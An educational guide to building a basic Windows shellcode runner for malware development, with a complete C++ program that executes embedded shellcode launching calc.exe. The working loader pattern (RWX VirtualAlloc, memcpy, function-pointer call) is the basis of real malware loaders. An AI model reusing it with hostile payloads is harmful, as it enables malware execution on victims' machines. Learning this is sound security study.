Shellcode Injector Guide
Educational Notes: A structured guide to understanding shellcode injection fundamentals
Table of Contents
Overview
One of the easiest ways to get started with malware development (maldev) is to build a shellcode injector.
What is a shellcode injector?
A shellcode injector is a tool or program used to insert shellcode (executable binary code) into a target process’s memory so that the process will execute that code.
Implementation Steps
Building a basic shellcode injector is straightforward and can be done in a few lines of code:
| Step | Action | Windows API |
|---|---|---|
| 1 | Allocate executable memory | VirtualAlloc() |
| 2 | Copy shellcode to memory | memcpy() |
| 3 | Execute the shellcode | Function pointer cast |
Detailed Process:
- Memory Allocation: Use
VirtualAllocwithPAGE_EXECUTE_READWRITEpermissions - Data Copy: Transfer shellcode bytes using
memcpy - Execution: Cast pointer to function and invoke
Code Examples
Required Headers
#include <windows.h>
#include <iostream>
Basic Implementation Pattern
// Step 1: Allocate executable memory
LPVOID ptr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Step 2: Copy shellcode to allocated memory
memcpy(ptr, buf, sizeof(buf));
// Step 3: Cast to function pointer and execute
void (*func)() = (void(*)())ptr;
func();
Tip: Always check if
VirtualAllocreturnsNULLto handle allocation failures
Complete Implementation
The following demonstrates a working example that implements all the concepts above:
#include <windows.h>
#include <iostream>
unsigned char buf[] = {
0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,
0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,
0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,
0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,
0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,
0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,
0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,
0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x2E,
0x65, 0x78, 0x65, 0x00
};
int main() {
std::cout << "This is a shellcode try a calc will be launch" << std::endl;
LPVOID ptr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (ptr == NULL) {
std::cout <<" PTR is NULL" << std::endl;
return -1;
}
memcpy(ptr, buf, sizeof(buf));
void (*func)() = (void(*)())ptr;
func();
return 0;
}